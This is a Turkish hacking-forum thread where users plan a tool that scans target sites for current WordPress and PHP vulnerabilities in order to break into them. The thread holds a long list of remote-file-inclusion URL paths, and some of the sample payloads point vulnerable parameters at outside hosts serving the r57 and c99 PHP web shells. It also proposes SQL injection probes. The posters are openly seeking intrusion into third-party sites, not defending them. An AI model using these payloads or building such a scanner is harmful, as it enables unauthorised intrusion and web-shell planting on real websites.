Wordpress F.ker Yapalım... (2 Viewers)

[TETA]

Merhaba,

Arkadaşlar şunu düşündüm bir uygulama yazayım.

bu uygulamanın database'i olsun.
database'e wordpress güncel açıklarını sürekli ekleyelim.
uygulamaya hacker login olsun.

hedef siteyi bu güncel açıkların tamamıyla tarasın.

Öyle bir şey yazayım mı?

 

[Y&G-YaaDaa]

süper olur bro

 

[Isko~]

Yapalimi deil yap sergile

 

[Y&G-YaaDaa]

iskocuğum haklı

 

[TETA]

yapayım hemen fakat yardımınız lazım. bana küçük bir açık listesi verin de deneme yapayım hangi açıkları denesin ve bu açıklar karşılığında sitede hangi hata mesajı oluşuyor

 

[El-Cewad]

Eskiden bazı arkadaşlar php script yazardı exploit-db.com dan tüm açıkları denerdi sitede olan açıkları da yazardı şu açık var diye öyle birşey yazılabilir

 

[Isko~]

Eskiden bazı arkadaşlar php script yazardı exploit-db.com dan tüm açıkları denerdi sitede olan açıkları da yazardı şu açık var diye öyle birşey yazılabilir

 

[TETA]

bahsettiğini yapmak çok kolay kodlarını şimdi yazayım istiyorsan da bunu hedef sitede taratamazsın bu sadece exploit buluyor. benim bahsettiğim lfi-rfi tarzı url lazım bana.


/plugins/links/functions.inc?_CONF[path]=http://creativerentacar.com/r57.txt? bunun gibi açıklar

yada üye.php?=' sql injection açıkları gibi

site.com/plugins/links/functions.inc?_CONF[path]=http://creativerentacar.com/r57.txt? şeklinde yazdığında bir hata mesajı vermeli bu hata mesajından açık olduğunu anlayacağız var mı elinizde böyle açıklar

 

[Isko~]

hedefsite.com/

index2.php?includes_dir=
forums/toplist.php?phpbb_root_path=
forum/toplist.php?phpbb_root_path=
admin/config_settings.tpl.php?include_path=
include/common.php?include_path=
event/index.php?page=
forum/index.php?includeFooter=
forums/index.php?includeFooter=
forum/bb_admin.php?includeFooter=
forums/bb_admin.php?includeFooter=
language/lang_english/lang_activity.php?phpbb_root_path=
forum/language/lang_english/lang_activity.php?phpbb_root_path=
blend_data/blend_common.php?phpbb_root_path=
master.php?root_path=
includes/kb_constants.php?module_root_path=
forum/includes/kb_constants.php?module_root_path=
forums/includes/kb_constants.php?module_root_path=
classes/adodbt/sql.php?classes_dir=
agenda.php3?rootagenda=
agenda2.php3?rootagenda=
sources/lostpw.php?CONFIG[path]=
topsites/sources/lostpw.php?CONFIG[path]=
toplist/sources/lostpw.php?CONFIG[path]=
sources/join.php?CONFIG[path]=
topsites/sources/join.php?CONFIG[path]=
toplist/sources/join.php?CONFIG[path]=
topsite/sources/join.php?CONFIG[path]=
public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=
extras/poll/poll.php?file_newsportal=
index.php?site_path=
mail/index.php?site_path=
fclick/show.php?path=
show.php?path=
calogic/reconfig.php?GLOBALS[CLPath]=
eshow.php?Config_rootdir=
auction/auction_common.php?phpbb_root_path=
index.php?inc_dir=
calendar/index.php?inc_dir=
modules/TotalCalendar/index.php?inc_dir=
modules/calendar/index.php?inc_dir=
calendar/embed/day.php?path=
ACalendar/embed/day.php?path=
calendar/add_event.php?inc_dir=
claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=
claroline/auth/ldap/authldap.php?includePath=
docebo/modules/credits/help.php?lang=
modules/credits/help.php?lang=
config.php?returnpath=
editsite.php?returnpath=
in.php?returnpath=
addsite.php?returnpath=
includes/pafiledb_constants.php?module_root_path=
phpBB/includes/pafiledb_constants.php?module_root_path=
pafiledb/includes/pafiledb_constants.php?module_root_path=
auth/auth.php?phpbb_root_path=
auth/auth_phpbb/phpbb_root_path=
apc-aa/cron.php3?GLOBALS[AA_INC_PATH]=
apc-aa/cached.php3?GLOBALS[AA_INC_PATH]=
infusions/last_seen_users_panel/last_seen_users_panel.php?settings[locale]=
phpdig/includes/config.php?relative_script_path=
includes/phpdig/includes/config.php?relative_script_path=
includes/dbal.php?eqdkp_root_path=
eqdkp/includes/dbal.php?eqdkp_root_path=
dkp/includes/dbal.php?eqdkp_root_path=
path/include/SQuery/gameSpy2.php?libpath=
include/global.php?GLOBALS[includeBit]=
topsites/config.php?returnpath=
manager/frontinc/prepend.php?_PX_config[manager_path]=
ubbthreads/addpost_newpoll.php?addpoll=thispath=
forum/addpost_newpoll.php?thispath=
forums/addpost_newpoll.php?thispath=
ubbthreads/ubbt.inc.php?thispath=
forums/ubbt.inc.php?thispath=
forum/ubbt.inc.php?thispath=
forum/admin/addentry.php?phpbb_root_path=
admin/addentry.php?phpbb_root_path=
index.php?f=
index.php?act=
ipchat.php?root_path=
includes/orderSuccess.inc.php?glob[rootDir]=
stats.php?dir[func]=dir[base]=
ladder/stats.php?dir[base]=
ladders/stats.php?dir[base]=
sphider/admin/configset.php?settings_dir=http://almora.bravehost.com/c99.txt?
admin/configset.php?settings_dir=
vwar/admin/admin.php?vwar_root=
modules/vwar/admin/admin.php?vwar_root=
modules/vWar_Account/includes/get_header.php?vwar_root=
modules/vWar_Account/includes/functions_common.php?vwar_root2=
sphider/admin/configset.php?settings_dir=
admin/configset.php?settings_dir=
impex/ImpExData.php?systempath=

Boyle tarama yapmasini istiyorsun sen

 

[TETA]

aynen öyle bunları database e ekleyeceğiz ve her güncel açık olduğu zaman programda exploit ekle kısmı olacak oradan kişi exploit ekleyebilecek.

 

[Isko~]

salla ekur

 

[TETA]

salla derken anlamadım?